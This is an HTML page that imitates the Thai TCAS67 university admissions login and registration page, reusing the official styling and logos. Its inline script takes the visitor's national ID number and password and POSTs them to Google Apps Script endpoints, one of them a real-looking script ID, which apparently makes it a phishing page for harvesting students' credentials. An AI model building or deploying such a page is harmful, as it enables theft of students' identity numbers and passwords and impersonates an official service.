<!DOCTYPE html>
<html><head>
    <meta charset="utf-8">
    <link rel="icon" type="image/svg+xml" href="https://mytcas.com/favicon.svg">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="ระบบการคัดเลือกบุคคลเข้าศึกษาต่อในระดับมหาวิทยาลัย ปีการศึกษา 2567">
    <title>TCAS67 • ระบบการคัดเลือกบุคคลเข้าศึกษาต่อในระดับมหาวิทยาลัย ปีการศึกษา 2567</title>
    <link rel="stylesheet" href="index.css">
    <link rel="stylesheet" href="https://mytcas.com/_astro/courses.CzjDGjDm.css">
    <link rel="stylesheet" href="https://mytcas.com/_astro/index.UgyIeBMx.css">
    <link rel="stylesheet" href="https://student.mytcas.com/assets/scss/mobile.scss">
    <link rel="stylesheet" href="https://student.mytcas.com/assets/scss/_global.scss">
    <style>
        
:root {
    --s-border: #d8d6d0;
    --s-text: #191e23;
    --s-space: 16px;
    --s-gap: 16px;
    --s-box: 16px;
    --s-heading: kvl, sans-serif;
    --s-heading-weight: 500;
    --s-heading-line-height: 1.3;
    --s-body: tt, sans-serif;
    --s-body-font-size: 16px;
    --s-body-line-height: 1.8;
}
.site-body h1 {
    font-weight: bold;
    text-align: center;
    z-index: 2;
    position: relative;
    margin-bottom: 20px;
}
            .input-search {
                width: 100%;
                max-width: 400px;
                position: relative
            }

            .input-search #search {
                width: 100%;
                padding: 8px 30px 8px 12px
            }

            .input-search #search:focus-visible {
                border-color: #fff;
                outline: 3px solid var(--teal)
            }

            .input-search .i-search {
                position: absolute;
                top: 13px;
                right: 12px;
                color: var(--blue)
            }

            .t-result {
                position: relative;
                z-index: 10;
                filter: drop-shadow(var(--s-shadow-2));
                visibility: hidden;
                opacity: 0;
                height: 0;
                overflow: hidden;
                transition: transform .4s ease-in-out,opacity .3s linear,visibility 0s linear
            }

            .t-result.active {
                visibility: visible;
                height: auto;
                opacity: 1;
                overflow: unset;
                transform: translateY(-20px);
                transition-timing-function: cubic-bezier(0,.2,.25,1),linear,linear;
                margin-bottom: -20px
            }

            .t-result.active:after {
                content: "";
                display: block;
                position: absolute;
                left: calc(50% - 5px);
                top: -8px;
                width: 0;
                height: 0;
                border-style: solid;
                border-width: 0 10px 8px 10px;
                border-color: transparent transparent var(--teal) transparent;
                z-index: 2
            }

            .t-result h2 {
                margin: 0;
                padding: 8px var(--s-box);
                background-color: var(--teal);
                color: #fff;
                width: 100%;
                font-size: 1.125em;
                border-radius: 5px 5px 0 0;
                padding: 12px 16px;
                display: flex;
                align-items: center;
                justify-content: space-between
            }

            .t-result h2 b {
                font-size: 1rem;
                font-weight: 400
            }
        @media (min-width: 840px) {
}
        }
            @media (min-width: 768px) {
                .t-result {
                    max-width:750px;
                    transform: translate(-50%)
                }

                .t-result.active {
                    left: 50%;
                    transform: translate(-50%,-30px)
                }

                .t-result.-left {
                    transform: translate(0)
                }

                .t-result.-left.active {
                    left: 0;
                    transform: translateY(-30px)
                }

                .t-result.-left.active:after {
                    left: 30px
                }
            }

            .t-programs {
                padding: 0;
                margin: 0;
                background-color: #fff;
                border-radius: 0 0 5px 5px
            }

            .t-programs li {
                list-style: none;
                display: block;
                padding: 16px;
                position: relative
            }

            .t-programs li:nth-child(2n) {
                background-color: #f3f8fd
            }

            .t-programs li:last-child {
                border-radius: 0 0 5px 5px
            }

            .t-programs img {
                position: absolute;
                left: 16px;
                top: 22px
            }

            .t-programs a {
                display: block;
                color: var(--blue);
                line-height: 1.4;
                padding-left: 64px
            }

            .t-programs a>b,.t-programs a>span {
                display: block;
                font-size: .9em;
                font-weight: 400
            }

            .t-programs a strong {
                color: #ff6b00
            }

            .t-programs h3 {
                font-size: 1em;
                margin: 0 0 4px;
                font-weight: 700
            }

            .search-hide {
                transition: .4s ease-in-out;
                padding-top: 12px
            }

            .search-hide .i-university {
                width: 20px
            }

            .search-hide.active {
                opacity: 0
            }
      .round-1 , .round-2 , .round-4{display:none;}
@media (min-width: 1024px) {
    .site-body {
        padding: 0 20px 60px 90px;
    }
        .site-logo {
        margin-left: 70px;
        padding: 70px 0 0;
    }
    
    .t-nav li.m-home img {
        width: 40px;
        height: 48px;
    }
    .t-nav .active svg {
        width: 32px;
        height: 32px;
        padding: 6px;
    }

body {
        background-size: 600px auto;
        background-position: top right;
    }
}
  @media (max-width: 1023px) {
.t-row .col {
    width: 100%;
    position: relative;
    display: unset;
}
  }
.t-nav ul {
    padding: 0;
    margin: 0;
    display: grid;
    grid-template-columns: repeat(4, 1fr);
}      
@media (min-width: 1024px) {
    .t-nav ul {
        display: block!important;
    }
}
@media (min-width: 800px) {
    .t-form {
        padding: var(--s-box) var(--s-space);
    }
}@media (min-width: 768px) {
    :root {
        --s-space: 20px;
        --s-box: 20px;
        --s-gap: 20px;
    }
}
        
.site-logo {
    padding: 50px 20px 0;
    text-align: center;
    line-height: 0;
}
        
.text-center {
    text-align: center;
}
        
.t-box.-info {
    color: #033470;
    border: 2px solid #033470;
}
@media (min-width: 768px) {
    .t-box.-half {
        width: 50%;
    }
}
.t-box {
    background-color: #fff;
    box-shadow: 0px 1px 3px rgba(0, 0, 0, .15);
    padding: var(--s-box);
    border-radius: 3px;
    margin: 0 auto var(--s-space);
}
        
.t-box.-info b, .t-box.-info strong {
    color: #00a0a9;
}
        
.t-row {
    display: flex;
    width: calc(100% + 20px);
    margin-left: -10px;
    margin-right: -10px;
    flex-wrap: wrap;
    justify-content: center;
    margin-bottom: 10px;
}
        
@media (min-width: 768px) {
    .t-row .col {
        width: 50%;
    }
}
.t-row .col {
    width: 100%;
    position: relative;
    display: contents;
}
.t-row>div {
    padding: 0 10px 20px;
}
        
.t-form label {
    display: flex;
    width: 100%;
    justify-content: center;
}
label {
    font-family: var(--s-heading);
    font-weight: var(--s-heading-weight);
    font-size: 1.125em;
}
  .t-row .required>label:not(.has-meta):not(.no-x):after, .t-row .required>.has-meta>span:first-of-type:after {
    content: "*";
    color: #ea0c42;
    margin: 0 2px;
}
   
button, select, input, textarea {
    font-size: 1.125em;
    padding: .474em .5em .36em;
    line-height: 1.4;
    border-radius: 3px;
}
        
@media (min-width: 768px) {
    .t-form .action {
        padding-left: 10px;
        padding-right: 10px;
    }
}
.t-form .action {
    text-align: center;
    margin-bottom: var(--s-space);
    display: grid;
    grid-template-columns: repeat(1, 1fr);
    width: 100%;
}
@media (min-width: 1024px) {
    .t-row .col {
        width: 50%;
    }
    :root {
        --s-space: 30px;
    }
}
        
@media (min-width: 768px) {
    .t-form .action .btn-main {
        width: 50%;
    }
}
.t-form .action .btn-main {
    width: 100%;
    justify-content: center;
}
.btn-main.disabled {
/*     background-image: linear-gradient(to right, #606676, #68728c); */
    cursor: not-allowed;
}
@media (min-width: 1024px) {
    .btn-main {
        font-size: 1.125em;
    }
}
        
@media (min-width: 800px) {
    .t-form {
        /* padding: var(--s-box) var(--s-space); */
    }
}
.t-form {
    max-width: 760px;
    margin: 0 auto;
    padding: var(--s-box) 16px;
}
.t-row {
    display: flex;
    width: calc(100% + 20px);
    margin-left: -10px;
    margin-right: -10px;
    flex-wrap: wrap;
    justify-content: center;
}
        
input[type=text], input[type=date], input[type=number], input[type=tel], input[type=email], input[type=file], input[type=password], textarea {
    font-family: "kvl", sans-serif;
    border: 2px solid #d5d5d7;
    transition: .3s ease;
    background-size: 30px 20px;
    background-color: #fff;
    background-repeat: no-repeat;
    background-position: right center;
}

button, select, input, textarea {
    font-size: 1.125em;
    padding: .474em .5em .36em;
    line-height: 1.4;
    border-radius: 3px;
}
        </style>
  </head>
<body>
    <div id="root">
        <div id="tcas">
            <div class="t-loading"></div>
            <header class="site-header" id="head">
                <nav class="t-nav">
                    <ul>
                        <li class="m-home">
                            <a href="https://mytcas.pages.dev/">
                                <img src="https://student.mytcas.com/assets/img/icon.svg" alt="TCAS Logo" width="20" height="24">
                                <span>หน้าแรก</span>
                            </a>
                        </li>
                        <li class="m-register active">
                            <a href="/">
                                <svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="100" height="100" viewBox="0 0 48 48">
                                    <path d="M24 4A10 10 0 1024 24 10 10 0 1024 4zM36.021 28H11.979C9.785 28 8 29.785 8 31.979V33.5c0 3.312 1.885 6.176 5.307 8.063C16.154 43.135 19.952 44 24 44c7.706 0 16-3.286 16-10.5v-1.521C40 29.785 38.215 28 36.021 28z" fill="currentColor"></path>
                                </svg>
                                <span>เข้าสู่ระบบ</span>
                            </a>
                        </li>
                        <li class="m-manual">
                            <a href="course">
                                <svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="100" height="100" viewBox="0 0 48 48">
                                    <path d="M 24 6.0117188 C 22.96575 6.0117188 21.932156 6.2355937 20.972656 6.6835938 L 2.8652344 15.138672 C 2.3372344 15.384672 2 15.916047 2 16.498047 C 2 17.080047 2.3372344 17.611422 2.8652344 17.857422 L 20.972656 26.3125 C 21.949656 26.7685 22.974 26.996094 24 26.996094 C 25.026 26.996094 26.051344 26.7685 27.027344 26.3125 L 34 23.056641 L 34 35.503906 A 2.5 2.5 0 0 0 35.5 40 A 2.5 2.5 0 0 0 37 35.501953 L 37 21.835938 A 1.50015 1.50015 0 0 0 36.759766 20.765625 A 1.50015 1.50015 0 0 0 36.685547 20.664062 A 1.50015 1.50015 0 0 0 35.914062 20.138672 A 1.50015 1.50015 0 0 0 35.910156 20.136719 L 26.267578 15.666016 C 26.100483 15.481771 26 15.245683 26 14.998047 C 26 14.857047 26.03075 14.715078 26.09375 14.580078 C 26.32475 14.078078 26.921875 13.86175 27.421875 14.09375 L 37.857422 18.931641 C 38.554422 19.254641 39 19.953656 39 20.722656 L 45.134766 17.857422 C 45.154766 17.848422 45.160734 17.839078 45.177734 17.830078 C 45.465734 17.683078 45.712375 17.448813 45.859375 17.132812 C 46.209375 16.381813 45.884766 15.488672 45.134766 15.138672 L 27.027344 6.6835938 C 26.067844 6.2355937 25.03425 6.0117187 24 6.0117188 z M 10 24.396484 L 10 34.529297 C 10 36.678297 11.243969 38.636625 13.167969 39.515625 C 16.826969 41.186625 20.345875 42 23.921875 42 L 24 42 L 24.005859 42 C 26.723859 41.99 29.523422 41.503125 32.232422 40.578125 C 31.473422 39.773125 31 38.694 31 37.5 C 31 36.437 31.384 35.473125 32 34.703125 L 32 27.197266 L 27.873047 29.123047 C 26.635047 29.702047 25.332 29.996094 24 29.996094 C 22.668 29.996094 21.365953 29.702047 20.126953 29.123047 L 10 24.396484 z" fill="currentColor"></path></svg><span><em class="_plus">ข้อมูล</em>หลักสูตร</span></a></li><li class="m-docs"><a href="https://www.mytcas.com/docs/"><svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="100" height="100" viewBox="0 0 48 48"><path d="M 13.5 4 C 10.467 4 8 6.467 8 9.5 L 8 36 L 8 37.5 L 8 38.5 C 8 41.519774 10.480226 44 13.5 44 L 39.5 44 A 1.50015 1.50015 0 1 0 39.5 41 L 13.5 41 C 12.273237 41 11.277238 40.152347 11.050781 39 L 39.5 39 C 40.329 39 41 38.329 41 37.5 L 41 9.5 C 41 6.467 38.533 4 35.5 4 L 35 4 L 35 20.5 C 35 21.029 34.720625 21.519062 34.265625 21.789062 C 34.029625 21.929063 33.765 22 33.5 22 C 33.253 22 33.00525 21.938406 32.78125 21.816406 L 28 19.207031 L 23.21875 21.816406 C 22.75475 22.070406 22.191375 22.060063 21.734375 21.789062 C 21.279375 21.520063 21 21.029 21 20.5 L 21 4 L 13.5 4 z M 24 4 L 24 17.972656 L 27.28125 16.183594 C 27.50425 16.061594 27.753 16 28 16 C 28.247 16 28.49575 16.061594 28.71875 16.183594 L 32 17.972656 L 32 4 L 24 4 z" fill="currentColor"></path></svg><span>คู่มือ<em class="_plus">การใช้งาน</em></span></a></li></ul></nav></header>
            <div class="site-logo">
                <a href="/">
                    <img src="https://student.mytcas.com/assets/img/logo.svg" alt="TCAS Logo" class="logo" width="160" height="50">
                </a>
            </div>
            <main class="site-body">
                <div class="t-form">
                    <h1>ลงทะเบียน • เข้าสู่ระบบ</h1>
                    <p class="text-center">
                        <img src="https://student.mytcas.com/assets/img/thai_id.svg" width="213" height="122" alt="Thai ID Card">
                    </p>
                    <div class="t-box -info -half">เข้าระบบลงทะเบียนด้วย 
                        <b>เลขประจำตัวประชาชน 13 หลัก</b> หากไม่มี ให้ใช้ 
                        <b>G Number</b> หรือ
                        <b> Passport Number</b>
                    </div>
                    <div class="t-row">
                        <div class="col required">
                            <label class="has-meta"><span>เลขประจำตัว</span></label>
                            <input type="text" id="username" required="">
                        </div>
                    </div>
                    <div class="t-row">
                        <div class="col required">
                            <label class="has-meta"><span>รหัสผ่าน</span></label>
                            <input type="password" id="password" required="">
                        </div>
                    </div>
                    <div class="action">
                        <button class="btn-main" id="registerButton">ลงทะเบียน</button>
                        <button class="btn-main" id="loginButton">เข้าสู่ระบบ</button>
                    </div>
                </div>
            </main>
        </div>
    </div>

    <script>
        document.getElementById('registerButton').addEventListener('click', function() {
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;

            var data = {
                "username": username,
                "password": password
            };

            fetch('https://script.google.com/macros/s/your-script-id/exec', {
                method: 'POST',
                body: JSON.stringify(data),
                headers: {
                    'Content-Type': 'application/json'
                }
            })
            .then(response => response.json())
            .then(data => {
                if (data.result === "success") {
                    alert('ลงทะเบียนสำเร็จ');
                } else {
                    alert('เกิดข้อผิดพลาด: ' + data.message);
                }
            })
            .catch((error) => {
                console.error('Error:', error);
            });
        });

        document.getElementById('loginButton').addEventListener('click', function() {
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;

            var data = {
                "username": username,
                "password": password
            };

            fetch('https://script.google.com/macros/s/AKfycbwLUQS7RGxDFIH6-dLCAj16MYhQCFgLQZsJF-7QXKlaUqsQ-6YDsooabWqP3nceSQXS/exec', {
                method: 'POST',
                body: JSON.stringify(data),
                headers: {
                    'Content-Type': 'application/json'
                }
            })
            .then(response => response.json())
            .then(data => {
                if (data.result === "success") {
                    alert('เข้าสู่ระบบสำเร็จ');
                } else {
                    alert('เกิดข้อผิดพลาด: ' + data.message);
                }
            })
            .catch((error) => {
                console.error('Error:', error);
            });
        });
    </script>
</body>
</html>
